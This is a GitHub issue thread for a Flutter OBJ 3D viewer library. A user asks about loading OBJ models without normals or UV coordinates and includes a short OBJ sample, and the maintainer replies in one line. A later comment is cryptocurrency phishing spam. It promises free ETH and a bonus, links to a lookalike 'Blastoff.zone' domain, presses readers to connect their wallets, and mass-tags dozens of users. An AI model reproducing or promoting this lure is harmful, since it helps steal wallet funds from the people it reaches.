### ISSUE TITLE
Obj file without normals / uv

### ISSUE THREAD

**Issue by markuspaschi** [klaszlo8207/Flutter-OBJ-3D-Viewer#1]
Is it possible to create the 3D model without normals and uv's or to calculate them in real-time?

Regards Markus

P.S. this is my .obj file (condensed)

```
vn -0.5589991591519122 -0.40714397065320584 -0.7223252226166526
v 0.0670578554273 0.134484305978 -0.65794801712
vn 0.5145236087686594 0.6872121660382363 0.512840028535908
v 0.123673737049 0.16803739965 -0.650259852409
...
f 1 619 620
f 157 619 621
...
```

**Comment by klaszlo8207** [comment]
Yes you can update the library

**Comment by risangpinto** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
lero003, @ray-learn, @dade80vr, @Saka7, @chevronkey, @brobrojrod, @stevewaffles, @ninacat25, @jerryDrumm, @Techchild7, @Schoss, @dnev1551, @kevinnguyenai, @bcrigler, @adotsloan, @ljluestc, @paradoxicalNL, @jirkaformanek, @hemantasapkota, @kerrtravers, @be1box, @wyrover, @FormusohDinga, @tonyrevo, @thiagoghisicrypto, @leventozen, @cucuso, @o3LL, @nimbosa, @justHungryMan, @Winglonelion, @mydxnh, @Andrey543543, @mortezabahmani, @ellen-du, @YazaiHu, @noshitsecurity, @flmuel, @peterpme, @freshduer, @kidbomb, @mjvignesh, @kflwasjkl, @carsrlife, @diveyez, @godratio, @gummideepak, @IgorKonovalov, @orhanbalci174, @jinyahuan
